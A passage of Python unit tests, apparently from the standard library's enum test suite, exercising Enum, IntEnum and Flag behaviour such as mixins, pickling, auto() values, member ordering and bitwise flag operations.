class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_exclude_methods(self):
class whatever(Enum):
this = 'that'
these = 'those'
def really(self):
return 'no, not %s' % self.value
self.assertIsNot(type(whatever.really), whatever)
self.assertEqual(whatever.this.really(), 'no, not that')
def test_wrong_inheritance_order(self):
with self.assertRaises(TypeError):
class Wrong(Enum, str):
NotHere = 'error before this point'
def test_intenum_transitivity(self):
class number(IntEnum):
one = 1
two = 2
three = 3
class numero(IntEnum):
uno = 1
dos = 2
tres = 3
self.assertEqual(number.one, numero.uno)
self.assertEqual(number.two, numero.dos)
self.assertEqual(number.three, numero.tres)
def test_wrong_enum_in_call(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_wrong_enum_in_mixed_call(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_mixed_enum_in_call_1(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.female), Monochrome.white)
def test_mixed_enum_in_call_2(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.male), Monochrome.black)
def test_flufl_enum(self):
class Fluflnum(Enum):
def __int__(self):
return int(self.value)
class MailManOptions(Fluflnum):
option1 = 1
option2 = 2
option3 = 3
self.assertEqual(int(MailManOptions.option1), 1)
def test_introspection(self):
class Number(IntEnum):
one = 100
two = 200
self.assertIs(Number.one._member_type_, int)
self.assertIs(Number._member_type_, int)
class String(str, Enum):
yarn = 'soft'
rope = 'rough'
wire = 'hard'
self.assertIs(String.yarn._member_type_, str)
self.assertIs(String._member_type_, str)
class Plain(Enum):
vanilla = 'white'
one = 1
self.assertIs(Plain.vanilla._member_type_, object)
self.assertIs(Plain._member_type_, object)
def test_no_such_enum_member(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
Color(4)
with self.assertRaises(KeyError):
Color['chartreuse']
def test_new_repr(self):
class Color(Enum):
red = 1
green = 2
blue = 3
def __repr__(self):
return "don't you just love shades of %s?" % self.name
self.assertEqual(
repr(Color.blue),
"don't you just love shades of blue?",
)
def test_inherited_repr(self):
class MyEnum(Enum):
def __repr__(self):
return "My name is %s." % self.name
class MyIntEnum(int, MyEnum):
this = 1
that = 2
theother = 3
self.assertEqual(repr(MyIntEnum.that), "My name is that.")
def test_multiple_mixin_mro(self):
class auto_enum(type(Enum)):
def __new__(metacls, cls, bases, classdict):
temp = type(classdict)()
names = set(classdict._member_names)
i = 0
for k in classdict._member_names:
v = classdict[k]
if v is Ellipsis:
v = i
else:
i = v
i += 1
temp[k] = v
for k, v in classdict.items():
if k not in names:
temp[k] = v
return super(auto_enum, metacls).__new__(
metacls, cls, bases, temp)
class AutoNumberedEnum(Enum, metaclass=auto_enum):
pass
class AutoIntEnum(IntEnum, metaclass=auto_enum):
pass
class TestAutoNumber(AutoNumberedEnum):
a = ...
b = 3
c = ...
class TestAutoInt(AutoIntEnum):
a = ...
b = 3
c = ...
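# the following tests mix Enum into an int subclass that defines its own pickle hook
# (__getnewargs__, __getnewargs_ex__, __reduce__, or __reduce_ex__) and verify the members still pickle by identity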
def test_subclasses_with_getnewargs(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs__(self):
return self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_getnewargs_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs_ex__(self):
return self._args, {}
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce__(self):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce_ex__(self, proto):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_without_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_exception(self.assertRaises, TypeError, NEI.x)
test_pickle_exception(self.assertRaises, PicklingError, NEI)
def test_subclasses_without_direct_pickle_support_using_name(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
def __reduce_ex__(self, proto):
return getattr, (self.__class__, self._name_)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_tuple_subclass(self):
class SomeTuple(tuple, Enum):
__qualname__ = 'SomeTuple' # needed for pickle protocol 4
first = (1, 'for the money')
second = (2, 'for the show')
third = (3, 'for the music')
self.assertIs(type(SomeTuple.first), SomeTuple)
self.assertIsInstance(SomeTuple.second, tuple)
self.assertEqual(SomeTuple.third, (3, 'for the music'))
globals()['SomeTuple'] = SomeTuple
test_pickle_dump_load(self.assertIs, SomeTuple.first)
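# a custom __new__ can give every member a distinct _value_ (here 1, 2, 3), so identical class-body assignments still produce separate members rather than aliases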
def test_duplicate_values_give_unique_enum_items(self):
class AutoNumber(Enum):
first = ()
second = ()
third = ()
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
self.assertEqual(
list(AutoNumber),
[AutoNumber.first, AutoNumber.second, AutoNumber.third],
)
self.assertEqual(int(AutoNumber.second), 2)
self.assertEqual(AutoNumber.third.value, 3)
self.assertIs(AutoNumber(1), AutoNumber.first)
def test_inherited_new_from_enhanced_enum(self):
class AutoNumber(Enum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_inherited_new_from_mixed_enum(self):
class AutoNumber(IntEnum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = int.__new__(cls, value)
obj._value_ = value
return obj
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_equality(self):
class AlwaysEqual:
def __eq__(self, other):
return True
class OrdinaryEnum(Enum):
a = 1
self.assertEqual(AlwaysEqual(), OrdinaryEnum.a)
self.assertEqual(OrdinaryEnum.a, AlwaysEqual())
def test_ordered_mixin(self):
class OrderedEnum(Enum):
def __ge__(self, other):
if self.__class__ is other.__class__:
return self._value_ >= other._value_
return NotImplemented
def __gt__(self, other):
if self.__class__ is other.__class__:
return self._value_ > other._value_
return NotImplemented
def __le__(self, other):
if self.__class__ is other.__class__:
return self._value_ <= other._value_
return NotImplemented
def __lt__(self, other):
if self.__class__ is other.__class__:
return self._value_ < other._value_
return NotImplemented
class Grade(OrderedEnum):
A = 5
B = 4
C = 3
D = 2
F = 1
self.assertGreater(Grade.A, Grade.B)
self.assertLessEqual(Grade.F, Grade.C)
self.assertLess(Grade.D, Grade.A)
self.assertGreaterEqual(Grade.B, Grade.B)
self.assertEqual(Grade.B, Grade.B)
self.assertNotEqual(Grade.C, Grade.D)
def test_extending2(self):
class Shade(Enum):
def shade(self):
print(self.name)
class Color(Shade):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_extending3(self):
class Shade(Enum):
def shade(self):
return self.name
class Color(Shade):
def hex(self):
return '%s hexlified!' % self.value
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!')
def test_subclass_duplicate_name(self):
class Base(Enum):
def test(self):
pass
class Test(Base):
test = 1
self.assertIs(type(Test.test), Test)
def test_subclass_duplicate_name_dynamic(self):
from types import DynamicClassAttribute
class Base(Enum):
@DynamicClassAttribute
def test(self):
return 'dynamic'
class Test(Base):
test = 1
self.assertEqual(Test.test.test, 'dynamic')
def test_no_duplicates(self):
class UniqueEnum(Enum):
def __init__(self, *args):
cls = self.__class__
if any(self.value == e.value for e in cls):
a = self.name
e = cls(self.value).name
raise ValueError(
"aliases not allowed in UniqueEnum: %r --> %r"
% (a, e)
)
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
grene = 2
def test_init(self):
class Planet(Enum):
MERCURY = (3.303e+23, 2.4397e6)
VENUS = (4.869e+24, 6.0518e6)
EARTH = (5.976e+24, 6.37814e6)
MARS = (6.421e+23, 3.3972e6)
JUPITER = (1.9e+27, 7.1492e7)
SATURN = (5.688e+26, 6.0268e7)
URANUS = (8.686e+25, 2.5559e7)
NEPTUNE = (1.024e+26, 2.4746e7)
def __init__(self, mass, radius):
self.mass = mass # in kilograms
self.radius = radius # in meters
@property
def surface_gravity(self):
# universal gravitational constant (m^3 kg^-1 s^-2)
G = 6.67300E-11
return G * self.mass / (self.radius * self.radius)
self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.80)
self.assertEqual(Planet.EARTH.value, (5.976e+24, 6.37814e6))
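# _ignore_ names temporary variables used while filling the class body ('Period' and 'i' below); they are removed and never become members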
def test_ignore(self):
class Period(timedelta, Enum):
'''
different lengths of time
'''
def __new__(cls, value, period):
obj = timedelta.__new__(cls, value)
obj._value_ = value
obj.period = period
return obj
_ignore_ = 'Period i'
Period = vars()
for i in range(13):
Period['month_%d' % i] = i*30, 'month'
for i in range(53):
Period['week_%d' % i] = i*7, 'week'
for i in range(32):
Period['day_%d' % i] = i, 'day'
OneDay = day_1
OneWeek = week_1
OneMonth = month_1
self.assertFalse(hasattr(Period, '_ignore_'))
self.assertFalse(hasattr(Period, 'Period'))
self.assertFalse(hasattr(Period, 'i'))
self.assertTrue(isinstance(Period.day_1, timedelta))
self.assertTrue(Period.month_1 is Period.day_30)
self.assertTrue(Period.week_4 is Period.day_28)
def test_nonhash_value(self):
class AutoNumberInAList(Enum):
def __new__(cls):
value = [len(cls.__members__) + 1]
obj = object.__new__(cls)
obj._value_ = value
return obj
class ColorInAList(AutoNumberInAList):
red = ()
green = ()
blue = ()
self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue])
for member, value in zip(ColorInAList, range(3)):
value += 1
self.assertEqual(member.value, [value])
self.assertIs(ColorInAList([value]), member)
def test_conflicting_types_resolved_in_new(self):
class LabelledIntEnum(int, Enum):
def __new__(cls, *args):
value, label = args
obj = int.__new__(cls, value)
obj.label = label
obj._value_ = value
return obj
class LabelledList(LabelledIntEnum):
unprocessed = (1, "Unprocessed")
payment_complete = (2, "Payment Complete")
self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete])
self.assertEqual(LabelledList.unprocessed, 1)
self.assertEqual(LabelledList(1), LabelledList.unprocessed)
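# auto() defers to _generate_next_value_; the default yields 1, 2, 3, ... and subclasses may override it (e.g. to reuse the member name)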
def test_auto_number(self):
class Color(Enum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_name(self):
class Color(Enum):
def _generate_next_value_(name, start, count, last):
return name
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_name_inherit(self):
class AutoNameEnum(Enum):
def _generate_next_value_(name, start, count, last):
return name
class Color(AutoNameEnum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_garbage(self):
class Color(Enum):
red = 'red'
blue = auto()
self.assertEqual(Color.blue.value, 1)
def test_auto_garbage_corrected(self):
class Color(Enum):
red = 'red'
blue = 2
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
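# _missing_ is the fallback for failed value lookups: returning a member resolves the call, returning None gives ValueError,
# returning a non-member turns into TypeError, and a raised exception propagates with the ValueError chained as __context__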
def test_missing(self):
class Color(Enum):
red = 1
green = 2
blue = 3
@classmethod
def _missing_(cls, item):
if item == 'three':
return cls.blue
elif item == 'bad return':
# trigger internal error
return 5
elif item == 'error out':
raise ZeroDivisionError
else:
# trigger not found
return None
self.assertIs(Color('three'), Color.blue)
self.assertRaises(ValueError, Color, 7)
try:
Color('bad return')
except TypeError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
try:
Color('error out')
except ZeroDivisionError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
def test_multiple_mixin(self):
class MaxMixin:
@classproperty
def MAX(cls):
max = len(cls)
cls.MAX = max
return max
class StrMixin:
def __str__(self):
return self._name_.lower()
class SomeEnum(Enum):
def behavior(self):
return 'booyah'
class AnotherEnum(Enum):
def behavior(self):
return 'nuhuh!'
def social(self):
return "what's up?"
class Color(MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(MaxMixin, StrMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class CoolColor(StrMixin, SomeEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolColor.RED.value, 1)
self.assertEqual(CoolColor.GREEN.value, 2)
self.assertEqual(CoolColor.BLUE.value, 3)
self.assertEqual(str(CoolColor.BLUE), 'blue')
self.assertEqual(CoolColor.RED.behavior(), 'booyah')
class CoolerColor(StrMixin, AnotherEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolerColor.RED.value, 1)
self.assertEqual(CoolerColor.GREEN.value, 2)
self.assertEqual(CoolerColor.BLUE.value, 3)
self.assertEqual(str(CoolerColor.BLUE), 'blue')
self.assertEqual(CoolerColor.RED.behavior(), 'nuhuh!')
self.assertEqual(CoolerColor.RED.social(), "what's up?")
class CoolestColor(StrMixin, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolestColor.RED.value, 1)
self.assertEqual(CoolestColor.GREEN.value, 2)
self.assertEqual(CoolestColor.BLUE.value, 3)
self.assertEqual(str(CoolestColor.BLUE), 'blue')
self.assertEqual(CoolestColor.RED.behavior(), 'booyah')
self.assertEqual(CoolestColor.RED.social(), "what's up?")
class ConfusedColor(StrMixin, AnotherEnum, SomeEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ConfusedColor.RED.value, 1)
self.assertEqual(ConfusedColor.GREEN.value, 2)
self.assertEqual(ConfusedColor.BLUE.value, 3)
self.assertEqual(str(ConfusedColor.BLUE), 'blue')
self.assertEqual(ConfusedColor.RED.behavior(), 'nuhuh!')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
class ReformedColor(StrMixin, IntEnum, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ReformedColor.RED.value, 1)
self.assertEqual(ReformedColor.GREEN.value, 2)
self.assertEqual(ReformedColor.BLUE.value, 3)
self.assertEqual(str(ReformedColor.BLUE), 'blue')
self.assertEqual(ReformedColor.RED.behavior(), 'booyah')
self.assertEqual(ReformedColor.RED.social(), "what's up?")
self.assertTrue(issubclass(ReformedColor, int))
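# _order_ is an optional space-separated list of member names; class creation raises TypeError when it does not match the actual definition order (aliases may be omitted)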
class TestOrder(unittest.TestCase):
def test_same_members(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
def test_same_members_with_aliases(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
verde = green
def test_same_members_wrong_order(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
blue = 3
green = 2
def test_order_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
def test_order_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
verde = green
def test_enum_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
def test_enum_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
verde = green
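# Flag members combine with |, &, ^ and ~; composite values become synthesized pseudo-members, and a member whose value is 0 is falsey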
class TestFlag(unittest.TestCase):
"""Tests of the Flags."""
class Perm(Flag):
R, W, X = 4, 2, 1
class Open(Flag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(Flag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.0')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
self.assertEqual(repr(~Perm.R), '<Perm.W|X: 3>')
self.assertEqual(repr(~Perm.W), '<Perm.R|X: 5>')
self.assertEqual(repr(~Perm.X), '<Perm.R|W: 6>')
self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: 1>')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.0: 0>')
self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: 7>')
Open = self.Open
self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: 524291>')
self.assertEqual(repr(~Open.WO), '<Open.CE|RW: 524290>')
self.assertEqual(repr(~Open.AC), '<Open.CE: 524288>')
self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC: 3>')
self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: 2>')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i | j), Perm(i.value | j.value))
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for i in Perm:
self.assertIs(i | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual((i & j).value, i.value & j.value)
self.assertIs(type(i & j), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & RWX, i)
self.assertIs(RWX & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for i in Perm:
